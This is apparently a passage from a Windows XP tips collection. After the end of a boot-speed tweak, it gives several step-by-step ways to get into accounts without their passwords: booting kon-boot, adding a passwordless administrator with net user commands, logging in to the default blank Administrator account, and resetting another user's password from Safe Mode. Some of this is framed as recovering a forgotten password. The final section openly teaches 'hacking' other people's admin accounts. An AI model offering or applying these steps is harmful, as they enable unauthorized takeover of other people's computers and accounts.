10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.

11. Reboot your computer.

WindowsXP should now boot REALLY faster

Reset password from kon-boot

use a program called kon-boot. just google it and download the .iso image. use active iso burner to burn it to a cd. reboot the computer and go to the boot menu. boot from your cd drive and let kon-boot do its thing. when you go to log in to the selected profile leave the password field blank and enter. you’re in the account. you can’t change your own password if you don’t know it! to fix this, pull up a command prompt and type in (without quotes):
“net user username /add”
(username is any name you want)
hit enter then type (without quotes):
“net localgroup administrators /add username”
(where username is the same as it was before)
this will create a user with administrative privileges and no password. login to this user and go to control panel> user accounts> manage another acount. select the user you forgot the password for and delete its password. login.

A simple method to hack win xp account

Here is the method I know.
The first thing which you check if you forget login password. When we install Windows, it automatically creates an account “Administrator” and sets its password to blank. So if you have forget Your user account password then try this:
Start system and when you See Windows Welcome screen / Login screen, press ctrl+alt+del keys Twice and it’ll show Classic Login box. Now type “Administrator” (without quotes) in Username and leave Password field blank. Now press Enter and you should be able to log in Windows.
Now you can reset your account password from “Control Panel -> User Accounts”.

Window xp password hack

Hey Friends i will teach u how to Hack an Xp Password…………
Very simple and few steps will helps u to hack a xp password
1. Switch on the computer>>Press again and again F8 key .
2. u will get a black screen on that u will have a list of choices,> then Select the (Start Windows in Safe mode with command prompt).
3. After this u will be Taken to the Login Screen.
4.Select the Administrator login or Guest login Which doesnt Requires any password. so u will be taken to the Desktop.
5.Then Start>>Run>>Cmd
6.Type the following commands
C:\Net User >>After typing Enter this, so tat u will get a list of Admins Account.
C:\net user (User name) * >>> please Replace the Admins Account which u wish to hack in the User name location.
After this it will ask the New Password then confirm the new password.
**************** Have Fun Guys *****************